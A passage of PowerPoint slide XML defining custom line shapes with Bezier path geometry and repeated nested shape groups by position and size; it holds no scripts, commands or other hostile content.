              <a:gd name="connsiteX2" fmla="*/ 0 w 100589"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 21493"/>
              <a:gd name="connsiteX0" fmla="*/ 93675 w 102284"/>
              <a:gd name="connsiteY0" fmla="*/ 21493 h 21493"/>
              <a:gd name="connsiteX1" fmla="*/ 102284 w 102284"/>
              <a:gd name="connsiteY1" fmla="*/ 10047 h 21493"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 102284"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 21493"/>
              <a:gd name="connsiteX0" fmla="*/ 93957 w 102566"/>
              <a:gd name="connsiteY0" fmla="*/ 22348 h 22348"/>
              <a:gd name="connsiteX1" fmla="*/ 102566 w 102566"/>
              <a:gd name="connsiteY1" fmla="*/ 10902 h 22348"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 102566"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 22348"/>
              <a:gd name="connsiteX0" fmla="*/ 93957 w 102566"/>
              <a:gd name="connsiteY0" fmla="*/ 22348 h 22348"/>
              <a:gd name="connsiteX1" fmla="*/ 96916 w 102566"/>
              <a:gd name="connsiteY1" fmla="*/ 22206 h 22348"/>
              <a:gd name="connsiteX2" fmla="*/ 102566 w 102566"/>
              <a:gd name="connsiteY2" fmla="*/ 10902 h 22348"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 102566"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 22348"/>
              <a:gd name="connsiteX0" fmla="*/ 1 w 8610"/>
              <a:gd name="connsiteY0" fmla="*/ 11446 h 11446"/>
              <a:gd name="connsiteX1" fmla="*/ 2960 w 8610"/>
              <a:gd name="connsiteY1" fmla="*/ 11304 h 11446"/>
              <a:gd name="connsiteX2" fmla="*/ 8610 w 8610"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 11446"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8610" h="11446">
                <a:moveTo>
                  <a:pt x="1" y="11446"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="-49" y="11367"/>
                  <a:pt x="3010" y="11383"/>
                  <a:pt x="2960" y="11304"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8610" y="0"/>
                </a:ln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0" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8941859" y="5719763"/>
            <a:ext cx="2153322" cy="1028700"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 14539 w 14539"/>
              <a:gd name="connsiteY0" fmla="*/ 12226 h 12226"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 14539"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 12226"/>
              <a:gd name="connsiteX0" fmla="*/ 47859 w 47859"/>
              <a:gd name="connsiteY0" fmla="*/ 38813 h 38813"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 47859"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 38813"/>
              <a:gd name="connsiteX0" fmla="*/ 47859 w 47859"/>
              <a:gd name="connsiteY0" fmla="*/ 38813 h 38813"/>
              <a:gd name="connsiteX1" fmla="*/ 33499 w 47859"/>
              <a:gd name="connsiteY1" fmla="*/ 20446 h 38813"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 47859"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 38813"/>
              <a:gd name="connsiteX0" fmla="*/ 47859 w 47859"/>
              <a:gd name="connsiteY0" fmla="*/ 38813 h 38821"/>
              <a:gd name="connsiteX1" fmla="*/ 47753 w 47859"/>
              <a:gd name="connsiteY1" fmla="*/ 34104 h 38821"/>
              <a:gd name="connsiteX2" fmla="*/ 33499 w 47859"/>
              <a:gd name="connsiteY2" fmla="*/ 20446 h 38821"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 47859"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 38821"/>
              <a:gd name="connsiteX0" fmla="*/ 47753 w 47753"/>
              <a:gd name="connsiteY0" fmla="*/ 34104 h 34104"/>
              <a:gd name="connsiteX1" fmla="*/ 33499 w 47753"/>
              <a:gd name="connsiteY1" fmla="*/ 20446 h 34104"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 47753"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 34104"/>
              <a:gd name="connsiteX0" fmla="*/ 47753 w 47753"/>
              <a:gd name="connsiteY0" fmla="*/ 34104 h 34104"/>
              <a:gd name="connsiteX1" fmla="*/ 33499 w 47753"/>
              <a:gd name="connsiteY1" fmla="*/ 20446 h 34104"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 47753"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 34104"/>
              <a:gd name="connsiteX0" fmla="*/ 14254 w 14254"/>
              <a:gd name="connsiteY0" fmla="*/ 13658 h 13658"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 14254"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 13658"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14254" h="13658">
                <a:moveTo>
                  <a:pt x="14254" y="13658"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:ln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1" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4905022" y="1950722"/>
            <a:ext cx="1201536" cy="730184"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 16998 w 16998"/>
              <a:gd name="connsiteY0" fmla="*/ 5740 h 5740"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 16998"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 5740"/>
              <a:gd name="connsiteX0" fmla="*/ 10000 w 10000"/>
              <a:gd name="connsiteY0" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX1" fmla="*/ 7886 w 10000"/>
              <a:gd name="connsiteY1" fmla="*/ 4089 h 10000"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 10000"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 17081"/>
              <a:gd name="connsiteY0" fmla="*/ 31836 h 31836"/>
              <a:gd name="connsiteX1" fmla="*/ 16395 w 17081"/>
              <a:gd name="connsiteY1" fmla="*/ 4089 h 31836"/>
              <a:gd name="connsiteX2" fmla="*/ 8509 w 17081"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 31836"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 18986"/>
              <a:gd name="connsiteY0" fmla="*/ 31836 h 31836"/>
              <a:gd name="connsiteX1" fmla="*/ 18300 w 18986"/>
              <a:gd name="connsiteY1" fmla="*/ 10713 h 31836"/>
              <a:gd name="connsiteX2" fmla="*/ 8509 w 18986"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 31836"/>
              <a:gd name="connsiteX0" fmla="*/ 9791 w 9837"/>
              <a:gd name="connsiteY0" fmla="*/ 10713 h 10775"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 9837"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 10775"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9837" h="10775">
                <a:moveTo>
                  <a:pt x="9791" y="10713"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="10477" y="11573"/>
                  <a:pt x="3333" y="3333"/>
                  <a:pt x="0" y="0"/>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6" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8311991" y="1380175"/>
            <a:ext cx="567302" cy="1153052"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 10000 w 14181"/>
              <a:gd name="connsiteY0" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX1" fmla="*/ 12023 w 14181"/>
              <a:gd name="connsiteY1" fmla="*/ 6012 h 10000"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 14181"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 93452"/>
              <a:gd name="connsiteY0" fmla="*/ 23142 h 23142"/>
              <a:gd name="connsiteX1" fmla="*/ 91294 w 93452"/>
              <a:gd name="connsiteY1" fmla="*/ 6012 h 23142"/>
              <a:gd name="connsiteX2" fmla="*/ 79271 w 93452"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 23142"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 91348"/>
              <a:gd name="connsiteY0" fmla="*/ 23142 h 23142"/>
              <a:gd name="connsiteX1" fmla="*/ 89190 w 91348"/>
              <a:gd name="connsiteY1" fmla="*/ 9368 h 23142"/>
              <a:gd name="connsiteX2" fmla="*/ 79271 w 91348"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 23142"/>
              <a:gd name="connsiteX0" fmla="*/ 9919 w 10257"/>
              <a:gd name="connsiteY0" fmla="*/ 9368 h 9697"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 10257"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 9697"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10257" h="9697">
                <a:moveTo>
                  <a:pt x="9919" y="9368"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12077" y="11421"/>
                  <a:pt x="3333" y="3333"/>
                  <a:pt x="0" y="0"/>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7" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8843763" y="2064068"/>
            <a:ext cx="1939990" cy="480060"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 522"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4807596" y="6569393"/>
            <a:ext cx="543806" cy="582930"/>
            <a:chOff x="4" y="2581"/>
            <a:chExt cx="222" cy="219"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="Group 523"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4" y="2637"/>
              <a:ext cx="222" cy="169"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36345"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46"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347"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5" name="Group 527"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4" y="2624"/>
              <a:ext cx="222" cy="169"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36342"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43"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4"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337"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38"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39"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0"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1"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7" name="Group 370"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4853310" y="6650355"/>
            <a:ext cx="313333" cy="269558"/>
            <a:chOff x="52" y="2901"/>
            <a:chExt cx="145" cy="125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="8" name="Group 371"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="52" y="2937"/>
              <a:ext cx="145" cy="96"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36332"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33"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334"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12" name="Group 375"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="52" y="2922"/>
              <a:ext cx="145" cy="96"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36329"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30"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31"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324"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25"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26"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27"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28"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 522"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6160924" y="7022783"/>
            <a:ext cx="543806" cy="582930"/>
            <a:chOff x="4" y="2581"/>
            <a:chExt cx="222" cy="219"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="14" name="Group 523"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4" y="2637"/>
              <a:ext cx="222" cy="169"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36319"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20"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321"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15" name="Group 527"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4" y="2624"/>
              <a:ext cx="222" cy="169"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36316"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17"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18"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311"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12"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13"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14"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15"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18" name="Group 370"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6306376" y="7136997"/>
            <a:ext cx="313331" cy="269558"/>
            <a:chOff x="52" y="2901"/>
            <a:chExt cx="145" cy="125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="Group 371"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="52" y="2937"/>
              <a:ext cx="145" cy="96"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36306"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07"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308"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0" name="Group 375"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="52" y="2922"/>
              <a:ext cx="145" cy="96"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36303"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04"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05"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298"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99"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00"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01"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02"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Group 522"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="12069463" y="5820730"/>
            <a:ext cx="543806" cy="582930"/>
            <a:chOff x="4" y="2581"/>
            <a:chExt cx="222" cy="219"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="22" name="Group 523"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4" y="2637"/>
              <a:ext cx="222" cy="169"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36293"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94"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295"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3" name="Group 527"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4" y="2624"/>
              <a:ext cx="222" cy="169"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36290"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91"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92"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285"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86"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87"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88"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89"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4" name="Group 370"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="12115176" y="5901690"/>
            <a:ext cx="313331" cy="269558"/>
            <a:chOff x="52" y="2901"/>
            <a:chExt cx="145" cy="125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="25" name="Group 371"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="52" y="2937"/>
              <a:ext cx="145" cy="96"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36280"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81"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282"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6" name="Group 375"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="52" y="2922"/>
              <a:ext cx="145" cy="96"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36277"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78"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79"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272"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73"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74"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75"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76"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Group 522"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9544716" y="6641783"/>
            <a:ext cx="543806" cy="582930"/>
            <a:chOff x="4" y="2581"/>
            <a:chExt cx="222" cy="219"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="28" name="Group 523"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4" y="2637"/>
              <a:ext cx="222" cy="169"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36267"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68"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269"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9" name="Group 527"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4" y="2624"/>
              <a:ext cx="222" cy="169"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36264"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65"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6"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259"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0"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1"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2"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3"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0" name="Group 370"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9590428" y="6722745"/>
            <a:ext cx="313333" cy="269558"/>
            <a:chOff x="52" y="2901"/>
            <a:chExt cx="145" cy="125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="31" name="Group 371"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="52" y="2937"/>
              <a:ext cx="145" cy="96"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36254"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55"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256"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075" name="Group 375"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="52" y="2922"/>
              <a:ext cx="145" cy="96"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36251"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52"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53"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246"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47"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48"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49"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50"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36115" name="Group 522"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5667591" y="1582103"/>
            <a:ext cx="543806" cy="582930"/>
            <a:chOff x="4" y="2581"/>
            <a:chExt cx="222" cy="219"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="36127" name="Group 523"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4" y="2637"/>
              <a:ext cx="222" cy="169"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36215"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16"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217"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128" name="Group 527"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4" y="2624"/>
              <a:ext cx="222" cy="169"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36212"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13"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14"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207"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08"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09"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10"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11"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6140" name="Group 370"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5713304" y="1663065"/>
            <a:ext cx="313331" cy="269558"/>
            <a:chOff x="52" y="2901"/>
            <a:chExt cx="145" cy="125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="36141" name="Group 371"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="52" y="2937"/>
              <a:ext cx="145" cy="96"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36202"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03"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204"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153" name="Group 375"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="52" y="2922"/>
              <a:ext cx="145" cy="96"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36199"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00"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01"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94"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95"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96"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97"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98"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36154" name="Group 522"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6757108" y="1249682"/>
            <a:ext cx="543806" cy="582930"/>
            <a:chOff x="4" y="2581"/>
            <a:chExt cx="222" cy="219"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="36166" name="Group 523"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4" y="2637"/>
              <a:ext cx="222" cy="169"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36189"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90"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91"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167" name="Group 527"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4" y="2624"/>
              <a:ext cx="222" cy="169"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36186"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87"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8"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81"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2"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3"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4"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5"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6179" name="Group 370"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6802824" y="1330646"/>
            <a:ext cx="313331" cy="269557"/>
            <a:chOff x="52" y="2901"/>
            <a:chExt cx="145" cy="125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="36180" name="Group 371"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="52" y="2937"/>
              <a:ext cx="145" cy="96"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
